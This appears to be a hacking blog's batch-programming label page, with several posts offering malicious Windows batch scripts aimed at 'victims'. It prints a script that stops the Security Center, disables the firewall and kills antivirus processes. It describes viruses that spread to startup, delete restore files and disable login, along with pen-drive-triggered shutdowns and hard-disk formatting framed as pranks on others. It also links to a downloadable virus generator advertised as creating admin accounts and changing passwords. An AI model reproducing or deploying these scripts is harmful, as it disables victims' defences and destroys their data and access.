Showing posts with label Batch Programming. Show all posts
Showing posts with label Batch Programming. Show all posts

Monday, July 9, 2012

Making your own trojan in a .bat file

Open a dos prompt we will only need a dos prompt , and windows xp…
-Basics-
Opening a dos prompt -> Go to start and then execute and write
cmd and press ok
Now insert this command: net
And you will get something like this
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send
We will select some of those commands and put them on a .bat file.
What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and whrite there:

Sunday, December 25, 2011

In Shadow Batch Virus Generator


Kemampuan:
- Menginfeksi beragam ekstensi file populer
- Mengaktifkan virus ketika start up
- Mematikan berbagai proses dan service penting
- Mengganti ekstensi file dan menyebarkanya melalui file sharing
- Membuat account administrator baru, mengganti password administrator.
- Mematikan komputer otomatis, mendownload files otomatis, dll

Download Here :
http://www.mediafire.com/download.php?1hrt41lpz3t51b1

Tuesday, October 4, 2011

How to disable/delete your victim's Antivirus



How to disable/delete your victim's Antivirus?

 Here i am giving you the batch program to disable or delete the antivirus in victims computer.


@ echo off

 rem --

 rem Permanently Kill Anti-Virus

 net stop “Security Center”

 netsh firewall set opmode mode=disable

 tskill /A av*

 tskill /A fire*

 tskill /A anti*

 cls

 tskill /A spy*

 tskill /A bullguard

 tskill /A PersFw

 tskill /A KAV*

 tskill /A ZONEALARM

Friday, August 26, 2011

Format HDD using Batch program and Binary codes in Notepad

If you like to format some others HDD , This tutorial will help you.   Here i am going to give you the Batch program and binary code that will format the hard disk. 

 It will be very funny if you implement it in your college or school or in your friend computer (for fun,but it will destroy the os ).

       Don't Try it on your PC.  Then you can't boot to your OS.  Then you need to install the OS.

Follow the Steps:

How to disable your victim's Mouse whenever he insert pen drive

Hi friends ,  Hacking is one of the fun .  You can attract your friends by simply doing some hacks before them.  You can also make your victims or enemies in confusion.  This article will help you to make the small fun with hack. 

 Let's come to the point.  Today i am going to guide you how to disable your victim's or friend's (whoever) mouse,whenever he inserts  pen drive.  You can call it as virus which will disable the mouse.


How we are going to do?

     We are going to create this virus using our usual Batch programming.  In this post i am not only giving you simply the code but also explanation for the Batch program.   So I hope that this post will make you happy.

How to shutdown your victim's system using pen drive

In my last post i explained you about how to create a virus which will disable the mouse whenever pen drive inserted.  In this post i will help you to make the virus to make the system turned off whenever pen drive is inserted.

Step 1:

copy this code into notepad:
@echo off
 shutdown -s -t 00

A small Introduction about Batch Programming for Hackers

 What is Batch file?
Batch files are a list of command line instructions that are "batched" together in one file. Most of the command lines can be executed within the command prompt, but batch files make the work load much easier. Batch files can be opened, copied, and edited using notepad.

 They are used for simple routines and low-level machine instruction. On Windows, many batch files can be seen within the c:\Windows directory.

 Batch files, more or less, make up the backbone of the Windows Operating System. The operating system must have access to these files and be able to add and delete instructions from them. Delete them, and you have effectively disabled the OS.

How to create a Dangerous virus using Batch programming?

In this post i am going to give you dangerous virus code which is written in Batch Programming language.

 Virus can do:
  • Copy itself into startup
  • Copy itself over one thousand times into random spots in your computer
  • Hide its self and all other created files
  • Task kill MSN, Norton, Windows Explorer, Limewire.
  • Swap the left mouse button with the right one
  • Opens alert boxes
  • Changes the time to 12:00 and shuts down the computer

Verry very Dangerous Virus Program using Batch Programming

Hi friends, here is another very very dangerous virus progrmming using Batch programming. This is very very danger than the previous virus code. So be careful than the before one.

Viruc will do:
  • Copy itself for multiple times.
  • This will disable the restore option by deleting the restore file.
  • This will disable the login option.
  • If this affect the system, then the user can't use his OS longer.
start

How to lock a folder without any software (Batch Programming)

Hi in my last post i guide you to create a batch programming to create a locker. This is very cool. You don't need to download any locker softwares. You are going to enjoy this hack.

 In my older post i explain you how to lock folder using command prompt. But in that no password option. But this is going to very cool using password.

Locker Code:

cls
 @ECHO OFF
 title Folder Locker